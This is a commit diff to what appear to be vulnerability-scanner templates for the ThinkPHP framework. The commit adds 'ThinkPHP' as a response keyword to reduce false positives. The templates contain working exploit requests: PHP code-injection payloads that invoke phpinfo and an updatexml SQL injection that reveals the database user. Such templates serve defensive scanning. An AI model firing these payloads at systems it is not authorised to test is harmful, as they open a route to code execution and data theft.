Added thinkphp keyword from response to avoid false positive
parent
5114232192
commit
88f6bba576
|
@ -12,13 +12,16 @@ requests:
|
|||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?s=/index/index/name/$%7B@phpinfo()%7D"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "PHP Extension"
|
||||
- "PHP Version"
|
||||
- "ThinkPHP"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
|
|
@ -12,13 +12,16 @@ requests:
|
|||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "PHP Extension"
|
||||
- "PHP Version"
|
||||
- "ThinkPHP"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
|
|
@ -12,16 +12,21 @@ requests:
|
|||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?s=captcha"
|
||||
|
||||
headers:
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
body: "_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "PHP Extension"
|
||||
- "PHP Version"
|
||||
- "ThinkPHP"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -12,13 +12,15 @@ requests:
|
|||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
condition: and
|
||||
words:
|
||||
- "SQLSTATE"
|
||||
- "XPATH syntax error"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 500
|
||||
|
|
Loading…
Reference in New Issue